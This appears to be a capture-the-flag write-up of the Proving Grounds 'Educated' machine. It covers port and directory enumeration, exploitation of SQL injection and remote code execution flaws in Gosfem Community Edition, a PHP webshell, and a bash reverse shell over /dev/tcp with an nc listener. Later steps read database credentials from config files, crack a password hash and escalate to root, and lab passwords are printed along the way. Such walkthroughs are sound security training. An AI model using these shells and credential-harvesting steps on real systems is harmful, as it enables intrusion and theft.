Educated - Proving Grounds
I start by enumerating all TCP ports from target machine with nmap.
nmap -sCV -v -p- --min-rate 1000 -T4
We have SSH(port 22) and Apache (port 80). I will enumerate Apache for the next step.
Apache - port 80
I see a main page about Windom Elementary School as i saw earlier on nmap scan and there is more Headers like "About Us", "Courses", "Contact" and "External".
Further i saw a note that says that this feature (Windom Elementary School) is a HTML template with Bootstrap 4.5.2 CSS layout wich i will keep as a note.
I will try to find hidden subdirectories with gobuster.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u -x php -b 404,403
On /management i found a login page about Gosfem Community Edition.
Gosfem Community Edition
I foud out 2 vulnerabilies while i was searching for vulnerabilities about Gosfem Community Edition. About theses vulnerabilities there is one about 'username' SQL Injection on this link and other about a Remote Code Execution (RCE) on this link.
'username' SQL Injection
It's about a SQLI on password field while doing login on a POST HTTP request and we can exemplify by using Burp Suite.
Since the login page is using email as a field and on the POC is using a name let's try to find for more subdiretories on /management subdirectory with gobuster.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u -x php -b 404,403
It seems that our main goal is using that POC on /management/admin login page but i got redirected to login page again.
I also can go to /management/uploads so i don't need to login to see the uploaded files and since we got a RCE POC let's try to use on burp and the POST request and see if this works.
Let's try go first to
but it keeps constantly loading the page but let's trie it anyway with Burp Suite.
Remote Code Execution (RCE) - Burp Suite
Let's replace the path for /management/admin/examQuestion/create and check on Repeater.
I got an error wich is about the spaces there is between "-" so let's clear that white spaces and try again.
It gaves a code 200 OK so let's go to /management/uploads subdirectory to checkout if the file is there.
Webshell didn't work - system
I tried to run some command on the webshell cmd.php but it didn't work so i saw the webshell php file and it was using eval function so le't change this for a system function.
Next let's create a bash file with a reverse shell in my local machine where i can use webshell to execute this bash file while i have a listener waiting to be connected to the target machine.
nano shell
/bin/bash -i >& /dev/tcp/ 0>&1
python3 -m http.server 80
nc -nlvp 9001 |bash
Privilege Escalation
Let's transfer to target machine and run it.
python3 -m http.server 80
cd /tmp
chmod +x
I found out a password to access a database called school_mgment.
I tried to do password spraying on the users on /home directory and as root user aswell to access with SSH on the target machine but it didn't work so i will see more about the database php file.
cd /var/www/html/management/application/config
cat database.php
Now that we have school:@jCma4s8ZM<?kA
credentials to access MySQL database let's connect to it.
MySQL Server
mysql -u school -p
show databases;
use school_mgment;
show tables;
select * from teacher;
I found this hash 3db12170ff3e811db10a76eadd9e9986e3c1a5b7 wich i used this link wich gave me password greatteacher123.
I will access by SSH with msander:greatteacher123 credentials.
ssh msander@
Let's get user flag.
I tried use sudo -l but didn't work so i checked id command and i saw that msander user belongs to staff so i searched more about this information wich i found this link that talks about staff group allows users to add local modifications to the system (/usr/local
) without needing root privileges (note that executables in /usr/local/bin
are in the PATH variable of any user, and they may "override" the executables in /bin
and /usr/bin
with the same name). Compare with group "adm", which is more related to monitoring/security.
Staff group - APK
I can read Emiller’s APK. We transfer the zip file to our attack machine first with Secure Copy Protocol (SCP).
scp msander@ .
Now let's use Jadx-GUI to uncover E.Miller’s password.
I found out E.Miller’s password wich is EzPwz2022_dev1$$23!!
by searching for password but i coud have search on res/values/strings.xml aswell.
So let's use it to access as emiller user.
su emiller
I tried to see what was sudo permissions but looks like we have them all.
sudo -l
Let's just access as root user with sudo su command.
sudo su
Since we have root permissions let's access root flag.
cd /root